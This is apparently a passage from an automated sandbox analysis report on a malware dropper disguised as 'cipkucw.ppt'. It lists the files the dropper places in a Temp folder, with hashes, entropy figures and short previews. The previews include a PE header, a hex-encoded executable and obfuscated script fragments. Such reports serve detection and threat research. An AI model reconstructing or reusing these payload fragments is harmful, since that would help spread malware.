                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.629681466265794
                                      Encrypted:false
                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\afda\djxaejqg.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):523
                                      Entropy (8bit):5.521120762513594
                                      Encrypted:false
                                      SSDEEP:12:rOQV8xmNmsclm90BPy4a1ZhfUm/u9DUpKQTayFlknE:rOQVHdcl2004a1fQ9DUpraynX
                                      MD5:7E36B7880B3ECD2297E6F62D55F7A65B
                                      SHA1:3815C7699D416A3277AAFE3B6A2169C777C85F17
                                      SHA-256:5669ADC7007BFF0DC135B86E4C5C10294B6F1E4505F9F3F77F5A363A67E7713B
                                      SHA-512:0F4F4278B3E263B24398297D3C669F61A41A5B794EA3497ECAAB6D315BB2ACBC9E7EC0ABECADCF3EE834D7F5D415644034AF966921CEB28208F0C9DF5AE3BFF6
                                      Malicious:false
                                      Preview:3z4Ky9aqyGldod1960R77Q97a2j8D4c1K49k8bID6s5E984I1cLDY36MP8CvdzC4161144cc78609g3Q4L7hoN9g14..ToolTipConstants TreeViewConstants..yA2A0Ocuys5O437u777rQ5b7g8b26S6Z227m0hU3O89DU2I3y50ae819dU32C0r87J05g..UpDownConstants DateTimeConstants..ys19cNG35G961QC8850179QN03543O6487hd0m21opQ14D4kqX2..UpDownConstants FileConstants..82ih944x66S9J81704t2zz18Ddk..GuiDateTimePicker StructureConstants..u8IcOFNz67RlGI..ColorConstants GuiDateTimePicker..4Ya2Mhu06PUzXbN1461xDBg7446vPs9gI672671ssb4Ly382j9yP..UpDownConstants ToolTipConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\dvru.icm

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):582
                                      Entropy (8bit):5.5429803774932855
                                      Encrypted:false
                                      SSDEEP:12:OjEgmHHPndBDBDTq8kHylC9RF4G8WemdadQjdjQ3KKfxQew:0EV/dBVDToHylC36IeKWQjdXaxTw
                                      MD5:C7812BBCCB4AB3DB46B91D7DCF04CD2C
                                      SHA1:C72A668DE5788F0F0F9392CCB85A340377CEA2E2
                                      SHA-256:FE7B196CD1D3BD99D083F252DB110D1951AA69F727C305E2B248707E69AC9D55
                                      SHA-512:9CC3C1E4D0DD28B11AE1B35915750D03E00154A83270EE02BD00A0B885FC1E78D97FD38572E910CCA0B7B2D7DBE04B1BF7912401511D8A23E270B49C52D85CBF
                                      Malicious:false
                                      Preview:W85Ww46Z2VCUvKznFu109a06Xe5077p4E547zVyC58bm2v35zF25E3Sr58T51j46335dD22y28pgF3pPw11KV2E189fyD27Z5Yd94xPA0166EEZ2P09076..FileConstants UpDownConstants..80Pf707gt5nS4U6O6m1mKdEr78147x1Yx452785277Um2v91Z7J5w3001e..StructureConstants StructureConstants..CZ3ejb075E04R..FontConstants ComboConstants..Pk65zCdG9434V9i6RkCdQ5j63wV545iVh0Y79GT256W1V0QX909V1MA48a02gKV00G29hyZEDdS664R7881wF0a5f165m3149DP27Kx34jQQ6897uK9k85W5P526fy3H3166O48s83s6NLBy7zQc5..DateTimeConstants ComboConstants..N24FiNoh20S2S390Oo60AK5Oq33D280CzI5O0tX007yVnZn9n0y0m041p7195Ga9738..GuiDateTimePicker FontConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\ebhfwhur.jpg

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):553
                                      Entropy (8bit):5.5226825444736445
                                      Encrypted:false
                                      SSDEEP:12:G74NaaLVlQWLlcbHe3yQU5Gr7lBKcspa3CBBDwPrdSTRX/2PUPHcaeCQNi:G79aLVlQW5eejBr7lIcbCBBSdgRX+PUT
                                      MD5:0D76C9CB1869319E76A6580C69604257
                                      SHA1:27BDE805B163C43C51D9E0619CE51DC4CDA0443B
                                      SHA-256:874EB67F37D176BC5557F707087641F74BC89EBF220DAA37E6864A2009843FFF
                                      SHA-512:C4C13686C845A61663C768FC7AC4705D9078C6D136FF0D3DED43E0C2F1EC2412B733E4648F347F429096C0455DA704DF6E7F8FD4E0E29C70B9712F519C27A518
                                      Malicious:false
                                      Preview:i352XFj5R73n838Q4O8C80r226p21dg23ZA9Pw440A2u8KL12S12Wq74uFzF2Q9EwJUS5T22K70S7h7G75XMB7B7pAs5yp268R045i5NZY53l0K51Y914Crro6z976..UpDownConstants GuiDateTimePicker..J4qx813E7u82740u9o8n71UShI71ESeFp148Z4kB73..ButtonConstants ToolTipConstants..j39j748e7V..ToolbarConstants ToolbarConstants..Cd4Zh57bDbT6J7PQT879745224X7bg6E028199F5676SQ96ooIP52909J3l7250D59e7B297470Zl219RfGof9Jkc94291fbz21y7ZdfvA3S661U9hve..DateTimeConstants ColorConstants..1Tv7n7H51L36t76oo200V3456Bpy5Yv3q9T0D6Xg0io304M13H01K16PdJaPHq51l79303N9518757hnA..FontConstants ComboConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\etlkuobjq.gum

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):111874
                                      Entropy (8bit):3.720029907971537
                                      Encrypted:false
                                      SSDEEP:1536:3wU1Zo3foIaXgwxInL+0wA67Td1uHSXeSXoWIcNIH0FIiVL32XclnW:5Zo3Ww7nLtzFH0uidmso
                                      MD5:EE0B6DCB2323FE5047DE83C300BE5C00
                                      SHA1:57510C2089062A35B49DCEFAD5F3552501698940
                                      SHA-256:8A7A595F49C43F8054F757A9FAE31D7D10177638ECA9D8060FC3A902A02785EA
                                      SHA-512:31D8AF76EF4B9992ADF5A4D78ED0C7231F35339EFA484D137519AB219EE76197669CBB18F1947D9A940E89A6A4655BA5D9757A68D604670F6134BAB83637358C
                                      Malicious:false
                                      Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]08]]]]E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]5045]]4C0/03]87F6*664]]]]]]]]E]]20/0_0/08]]FC]]]0*]]]]]]_E/*0/]]2]]]02]/]]]4]]02]]]]2]]04]]]]]]]04]]]]]]]]6]/]]02]]]]]]02]6085]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]064/*0/]57]]]]2]/]FF07]]]]]]]]]]]]]]]]]]]4]/]0C]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]2]]]8]]]]]]]]]]]082]]048]]]]]]]]]]]2E74657874]]]C4F*]]]2]]]0FC]]]02]]]]]]]]]]]]]]2]]0602E72737263]]]FF07]]]2]/]]08]]]FE]]]]]]]]]]]]]]4]]0402E72656C6F63]]0C]]]]4]/]]02]]]060/]]]]]]]]]]]]]4]]042]]]]]]]]]]]]]]]]*0/*0/]]]]]48]]]02]05]2C7*]]38*]]]3]]]0/]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]_FE_/E56F_CD973__2/9022430*57843]3D5644D2/E62_9D4F/80E7E6C3394/2E]2F]5C]]]/E0228/_]]0*2*/*7E/4]]042*/E0280/4]]042*/*7E/5]]042*/E0280/5]]042*/*7E/6]]042*/E0280/6]]042*/*7E/7]]042*/E0280/7]]042*/*7E/8]]042*/E0280/8]]042*/*7E/9]]042*/E0280/9]]042*/

                                      C:\Users\user\AppData\Local\Temp\afda\hoecxexa.mp3

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):616
                                      Entropy (8bit):5.5919274491792095
                                      Encrypted:false
                                      SSDEEP:12:UEuXqQ22KSBP1cDTH8prVz1cKnkg3qx+wMPHX6lTFI36k5g13E38tGyYCZc:vAqQWS7cDTH8prV55nkg3qQvql+Kb1Ez
                                      MD5:AA51853AD474CAF396B71D76EAD8C14A
                                      SHA1:9642CE89534071356D8936E433DA468A894CA7AB
                                      SHA-256:CED926B2FD7087FE3F55C6AC0BF6F69643BD41664EF0CBF73C0CEF6F37DF2E2A
                                      SHA-512:8BE2F90D5E4F93F190933065001539F39AA6217FFAE337037D5B4CDDF028B6E64C9C9C27D43CD8133E7E6D57C3D1F3A89AD252E9E9902633FE7660111CD11B5F
                                      Malicious:false
                                      Preview:X8L2q59H42s4q0K73498I4caYXMM615C30O0X23p78..FontConstants TreeViewConstants..95075Yi4n3fdc8Fq1hr499c12H52B1BJsl792N97jcyiyE78t2U457ynzRQ2825yi4u..StructureConstants DateTimeConstants..4c26g6U63bu5y0g50lL65o80BaJntu7YyTxw9c1FgdJX8493k1WBX602k2T90w6R078g05KK4953Y1sp7I94lWNkU52o1Pup8C1F4O126b80Ltc1740..ColorConstants BorderConstants..Bw6n9PN6840540FDuRRkD5r..UpDownConstants ComboConstants..2V826591GFE603I23V805pjV7ob426w4vjKP2H54066605cF8Z37euVt90ym4c1WDD7b2hwAer3V7j7Vx7w257dJxa3pu9r89a1ECt8y2466P0V0E0eu1U344K9V35Q6SwG1l9HaVsNJQ871t8wHq1DzRt05Z47fq92m58Uza60WpCF007QZ1F8tY5..GuiDateTimePicker StructureConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\itxdnkl.bmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):510
                                      Entropy (8bit):5.517685465810615
                                      Encrypted:false
                                      SSDEEP:12:wxI3wFxHcQ91GORov4rWt9EdCMMobSeORc:405QAgM4rW0tPb3gc
                                      MD5:3B87F8A73679F00EBB0F3A7C7B90A673
                                      SHA1:D98627E3F197171143C423DAEB59AA4E048D996C
                                      SHA-256:CCA32260AB795480D8E57E2EEF12F6ED7A19EFF48592C9B0A0A725AC23A70780
                                      SHA-512:D7D57CB735BF461E704048560F516B6C410BC0E5C9BD181AB27AC182BA37F9CB2AE3EFD3D239BE88C1B76578169B7026EF2E6AC22FCCC395FD1E5A2872C5CA92
                                      Malicious:false
                                      Preview:NB9H1P4g7I4wlNg59pr7I9d64WI22e6..BorderConstants BorderConstants..5ksEGn989u63H02tt15P408013b90fS868Qsvk279BPQXuQ7eEUKa610U0bymyL513eQM6H3989P18Ui636xAn2a3OVr3956z1pOB3..ColorConstants ButtonConstants..ig2SS0Y81Eg13at0k9k34TB03gUK6ud5S..FontConstants ComboConstants..w6M457503Rp2p0..ToolbarConstants StructureConstants..K4376nb7m1K1O16T28H8kvKB6A07O78157962127GVXq3bFAB82q339v4QVRIGQYj74WP9hxWC3IK8DdSTREHs6j201Y9g00u2054628q6G9AwNJv8100n86qo5hr6yI376t24hi7b7dvS39U7l9nK8..ToolbarConstants StructureConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\jaqharbas.pdf

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):670
                                      Entropy (8bit):5.592606713769875
                                      Encrypted:false
                                      SSDEEP:12:kmbOBPTUcj51BGQUSL58ANRjPN2l0YEXUbib89a0ygaJq:O9TaCrQlDrbib89ByPJq
                                      MD5:867F44ADC5EAFA2E46B8025FEA340D70
                                      SHA1:1E71245C15F72EA6E519820E036FD32FDC0006E2
                                      SHA-256:9E526DB38BA70B50E71A98707A0D292B74577A2C8392DB2A7488BFA62C5263A0
                                      SHA-512:2C73F76F89E563E1855861AEFAFA3EEF7990B1433CA0A6BF0350D28261CA26A335BAADE132D6FBF0FBDDC64BCABA74137D85209DC51B3A4E75344E5E133378C1
                                      Malicious:false
                                      Preview:93w0j497yh38VkUfVu6131u2..DateTimeConstants TreeViewConstants..T05IGEg152847u149Z4y04900TvJ1ttIm6LQ697J6k6E3W8ePXU98B5F5Cpb8V49j0A8ZFnID7V452602Qk..BorderConstants DateTimeConstants..A401f0d2Yk1S4HkVr8548Ophf446P2Lx8409CsT8g5d41763Wvov0968x2qI3121Z186Z891P1bp98UHP9T1asA3YuOOc01uSUV64i..TreeViewConstants FileConstants..7A09Yz3E09123038278ix564rz655PDHs02W88z401kQ2P4W0Y12833U9x1E2h840dWI0L3B42696wekh92TK227ZexPTb41FI23434H7m3216HJ02d1n9NN333UtwZ3K5Sh6..ComboConstants BorderConstants..31n5IuiA09krbSt2Vd711C0Qqh7x93FOfk13aB8l37pMD4o6t39NN6v7f61749jT71Ga07e3Y9cCXU318Gy8n1f9fUo50U7OO54F0VPVNsF8q5o8Lk986234UKuPaD173Lr3Ik8Rya305XXi..StructureConstants ToolTipConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\kmvbdgorw.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):565
                                      Entropy (8bit):5.579008606196203
                                      Encrypted:false
                                      SSDEEP:6:F2nX+luWhjeZhn+LWluQAxVUOd1hXoND1WDs6dBX/ZznpiRASvZq7BSc6iIfEqUR:FPuWQVLuHhC1WDVdBvJgRrq7BPKfEZ
                                      MD5:7DE3A12A6B90580EA356F948345FE9D7
                                      SHA1:6AFB6144330A0F4EC4F96FE33A7964D1652DB92B
                                      SHA-256:F33F8A54AE5D43DF50081A0A872EBCF501E471B8A1CEB918F1DF21FCD57781E9
                                      SHA-512:6BEB5D1855EE6FF9AFB7BEF1A08BE47AAB5026F9DF6C5D4075CDEEA17A15F6960AF1511ED543C1EF6B5A414658B1E2325553D5D38E58DB915D378A9B4764BAEC
                                      Malicious:false
                                      Preview:75KDF8YL7K3M6D93i35kW5OY2n5P8u2P2i2hLo57DZP30w2e30XO8N5..GuiDateTimePicker ComboConstants..ceqe87Xv4qtTpBj12k6bn9V8Yny6fq..ComboConstants DateTimeConstants..CWJ6y4NP0lA05KxwluKbSxV642cq51Lh..ToolTipConstants ToolTipConstants..6B8w740u01CMv7D2xCUo3U3O9Bz19Q083sTK853Fb057Mc2HeBc5nI6C8ISK3nS4av5rq047x4292BH71m74101J1T0U..ColorConstants BorderConstants..x1T42sM3tWF829CL0yyC0931x98507D482YuIRAI1a..ComboConstants TreeViewConstants..fK671qHE8faw403tPNq5bd68VG78B70Y8080Wt2F3wP5N393GV4ee1Wdj1L6C69GPp5kXt5X7096Z88n3cJbMTjLkO078J137Mhh..BorderConstants ButtonConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\lpfjthlm.icm

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):533
                                      Entropy (8bit):5.596652661396827
                                      Encrypted:false
                                      SSDEEP:12:gFBdRBntPrBPwCkI+Qi0f2qG9jYdepXdf2y:mPVKCkI+RQ2qG9sduXN2y
                                      MD5:0115DBA59A3AF38E30DA2F5AA6C96F4E
                                      SHA1:2B5AFECD853E5B03B004F3B42A2ED19677F350E7
                                      SHA-256:E54258A3C5F6258EE9C66A172FBEFB1C414EE2701B1B8F674746B05CCE851FBF
                                      SHA-512:3D4F63A33A2FB17217ECB187B94D1A6FAD3E15805A89B42C67DE12A5CC020AF62034E406A535EBB41396DB2358AEEB1B03489C115A92B3B427C0C08A994E765B
                                      Malicious:false
                                      Preview:4J9c6M137L7a00K..FileConstants ToolTipConstants..8K0QV692TbwNWcxL8uG90R31uxY7ln54064Z0371657Q3599jF8q52tkD243trPqpJNUB4TceR8CKd260p1QEm7Z..TreeViewConstants TreeViewConstants..45mJmSAc1S7Cz4F01omE765U6uc91J2843PpZTB81g42lLGZG002XKe7Y190h73R8U1378O602z934817gw47e279H77831AyVc595224BcHJT53IiS7M42auh9Gch138N4MA0t7ZR795G4tcWbkj02f54S89rJi5dUlKy2..ToolbarConstants FontConstants..rd911j8Bw4633Ft9uK843H03B49wU4gH88G0S2289L4NQ75t93D38S9yjq2D71L1a0cY67526a0vd0j06y8x135k3f9n7d60l67SaE5D20kA44846bW6Wh15..ColorConstants DateTimeConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\mwcjwjoov.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):661
                                      Entropy (8bit):5.616511330878746
                                      Encrypted:false
                                      SSDEEP:12:sLYnZZuKraBPwuo8B43u36Z/RcpUCAzcmzMwl22:sLI2Krajo8a3usROaciM8t
                                      MD5:82F446AE349917DD7DCD403AF18BAFAC
                                      SHA1:72970BD4AF23321134DA39AC452E28D31E219412
                                      SHA-256:CDD4DA4B65ABAFDCAC98AFE1080CDC549A074217EA67437A7311D0FF8F8862F4
                                      SHA-512:FAE4B9B118F9CAF74EA94334D014816C4B2AA4F4F3DB8E372C2A12DB49FD1D26E87808144724AACA22599F74B6B141FF288654B5C0F8511FEE580BD2BCAAAC55
                                      Malicious:false
                                      Preview:7b32s7e73Gg2Kv850O0..FileConstants GuiDateTimePicker..u0s4T0G8J6452194eG91E0fzfe5OYr3AAE6999rwsdUXo8F01La5t9zsg6ay3T8JlN1S03492U6jr70224pQ7X..ToolbarConstants TreeViewConstants..q5O0F9517p387j09z172wJqG80SGM1h6yC8zc8Z3..ToolbarConstants FileConstants..0OMyTi3O91H141680Q31VHB2jZX8f1Mp3kN80v6U18j59A487mK67Y078Q76m4y8830S2pR7Xj13063k752787q2..ColorConstants ButtonConstants..x116vRYO0hCsWef52482l10860525M50Ek15Z88wF7BcJAy69eiAAvb10ccYQ24R29bpR7X9M8U..ToolTipConstants GuiDateTimePicker..o49173G846njf8baQU86amvE4MuV126p4JfmdTW6V00j7mXi77a47g7A9Rw5O5631c3EY069rsH58Ju1I89iI9QKK4K8059uA2y743uV616496l5fZ018sOx3e4jl12DhAUp2GYD5..DateTimeConstants ButtonConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\mxrv.bin

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):617
                                      Entropy (8bit):5.585524949886685
                                      Encrypted:false
                                      SSDEEP:12:sySuCAwOQXJe18xeUP0rjDVcxqI0e4g0tFPIZUX9fxx8qnQ:stuCAlQc2eUPWjDViqNsE9VnQ
                                      MD5:C1D1C70A2088D6B655C9EBF6234B8014
                                      SHA1:E5BED845B8467B043CEFD3FFDF5A333AA9A0E3BA
                                      SHA-256:A53415B26AE088E51BCF047D4F56AC1C3A32F5953F498B5DD0F181FC8D0A609D
                                      SHA-512:ECB4C5B514B7AC155B34FBB5D2ACC1AF3260F6F34623C769599EEBBBD3709CC8DAD62CFB61F1D9E46E27DE5A98D083184D68A1888F8D52864D5BDD61B97B910C
                                      Malicious:false
                                      Preview:K7058D680663qQ2K308I4YY0Q88d54Z9h6x9q3K32989R5736H2by5w4tqm91Y4R75HdJ1Nf6K7N4sH974p164541e5hOkxo0n9t53nA215X55Ns..FontConstants ComboConstants..37vXW21S64zeg387Lp8y9mTEHw25474Y83B7w1rnbbZuqSJ6eNi5V7q88BHdyS25Y5e01x..ToolbarConstants BorderConstants..2Z5TE2iR5732Iuc6q6w0835c0T2spxtK1j25D58yN4d820c8J0er6ySBV9q0VAA532F3HdIGm0LXhGI6a0W220j483ECZdt9RF17e3eY41067d3L2na1I65Y420O333Z04k6972p8ha9468T9KOGw0m84D41Qij..TreeViewConstants BorderConstants..x737L4hw8F5Ag6AE6Q5J525XU8I2wr7fqZ957R18244135T9J9t05uGH6lR8xujbB7b2R3p7266LqKxhisLQgo074Y3aMf5kBw749E4DplZ0879d8l9dt43pLuX631Hy517235kp..ToolbarConstants ComboConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\nnjjangxc.pdf

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):610
                                      Entropy (8bit):5.472679932262326
                                      Encrypted:false
                                      SSDEEP:12:cM6bKRfqFJwOrnRsF70XnjRPPWXSiq0GGZjujQR60Kd4uvD9wJ:rPKnRs9aNPPWiiq0GctRQO2hwJ
                                      MD5:208B5D0B67FFD39189CB1E56F641A569
                                      SHA1:4B8151D25C424A62176AF7D99B27E02E962350F9
                                      SHA-256:3F5FB1AAE2DC3DF95033F74FA4214BA5806C8A3AA9F4784D2B02726F343B5B84
                                      SHA-512:59876ADFC0732347A324AED4C3373568FE77BDF82D7591B4F7508246DB20EE55E184F448DD8C29D1B1357DE442885856A7149F92EF9E06F060C3FC138F602D11
                                      Malicious:false
                                      Preview:z3Y2n8g49X19X31g11827q2kj0FjV1P2m8a3f10MB2u7z051Z54Lb8U9814nd0804017KV9YE33M82e31T7skA87o4M00108H089lvT7VYr32o723q8t9iE2072HA4v4m6U4q74..FontConstants ToolTipConstants..Sq0rDnE31m2ri7f5g077J272f1oXZ7719g64wm..DateTimeConstants ToolbarConstants..0fI062kn4559CeCc5n923m..UpDownConstants StructureConstants..4iFTr18i3853JHQ2m879to3uC78M7EP5Y52fQY2E323M7Jb420614S3s5g6l4kIpA..StructureConstants GuiDateTimePicker..079c6n2U0a6i2ts46g39U935iBvK2Q311I2K..StructureConstants DateTimeConstants..w25eru7rtY7ypAN8VtBJE8WPqlL59619BhEtc78b207vf62741MBcu6D92V5sz4sWB550838h36c13LwT78zo6EUhdv9..ColorConstants FontConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\ogtophmgw.mp3

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):583
                                      Entropy (8bit):5.606894856346951
                                      Encrypted:false
                                      SSDEEP:12:ZQpqZY51BJ3NBrMXGj+jvcwNPSNmxOvT03J3W7DbxiiPI0:yLE4+zjNPrir7vxa0
                                      MD5:0B720996F08404C60BE94CDABC5F9263
                                      SHA1:6BDA9867FD28209F187591A0675C03F75B86DDE8
                                      SHA-256:50C0A1003F14144466D3EB55FBF96113032E1D0C169890301E22D4E6D6BB2D1F
                                      SHA-512:58F68B7BB83FF2B25EA6104ED1FF791BBD0B68BF6E2D182E15E1BFC669EDD9D6F080541F801F217D66AFD7B50C6A9C9F95B03065CD53134B33CF9CF22A9C1B53
                                      Malicious:false
                                      Preview:9mV826q9zAMGJ14708CT87fmcNOFk530L13485ib076985F2417rP0yZiQDuN8St70NX5q72U4Xsx22yf5o34t592156w553sz1J692urlXV4r9CGZ115RM8hAo1K062F2UP3..GuiDateTimePicker DateTimeConstants..C7n60w9Nf5385aOQRGQ1434H8ZAoUt93TW9w39248BN348UaaZSy00K60IQV7tQy86e3Qd220asJ6K..ColorConstants FontConstants..3ll5jR8JX7zb0R12b0AK26V6nM5Gi50Xl913owK2Ly4t3wB6D3jo0RiJ465g5TzHv9n10s4w3..DateTimeConstants DateTimeConstants..LLU4J22Sk28972J5t996809D..GuiDateTimePicker ColorConstants..2L6uMOt5O12MfDln75ejWq27d9x3478ZJ5PcMu3z4198L5EJ57jaWaGYM004MW6bHO2Y5q70Y19V81gsJzmG4H387611..TreeViewConstants BorderConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\pgoh.vbe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):89890
                                      Entropy (8bit):3.0340576559820898
                                      Encrypted:false
                                      SSDEEP:192:IkkkkkkkkkkkkLhkkkkkkkkkkkkWkkkkkkkkkkkkskkkkkkkkkkkkRxkkkkkkkkz:QdB
                                      MD5:9CC31F5D12CE4609EC12D092A028BB23
                                      SHA1:AE3C36DA54C2142A6DC0D2987AD518ACC850F803
                                      SHA-256:1FC30FCF18A2B46D9F3256F069598E0D622615FFC39CF57558BE2B398F59E31E
                                      SHA-512:6E921A8972D1689D48625A4DC9AF744382D0880D7768D6906580E87355CEF39C789CB746DEB93F2E457F2A8CF3A3E6159E001400317051BA8397AA4D635379F8
                                      Malicious:false
                                      Preview:..T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.....T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.....T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.

                                      C:\Users\user\AppData\Local\Temp\afda\rjhr.pdf

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):34649
                                      Entropy (8bit):5.586154777776895
                                      Encrypted:false
                                      SSDEEP:768:lXC7WQmlFk5gviQr5HlfdIxNMan26hpqsQwlTZvqZEbb2B8n:lXC7wjia5HZduNN2McsQsSZj4
                                      MD5:55BC888147FD7CC3A422713F543596C8
                                      SHA1:748970FBC9A4F80714E0D4FD12D6209F60F2EC97
                                      SHA-256:FF7FC54EADE5736B5805B37BF827E5855A2F71E8D624665539368521A786A8D7
                                      SHA-512:66490BF66436F33B3FF20232E7A095C97F23CFC19C5E9FECBA436853F26ED7055CC3B9219F55B0329B5E656DE601A03FA9ECD9F2298FF44D2310BEAF5966F972
                                      Malicious:false
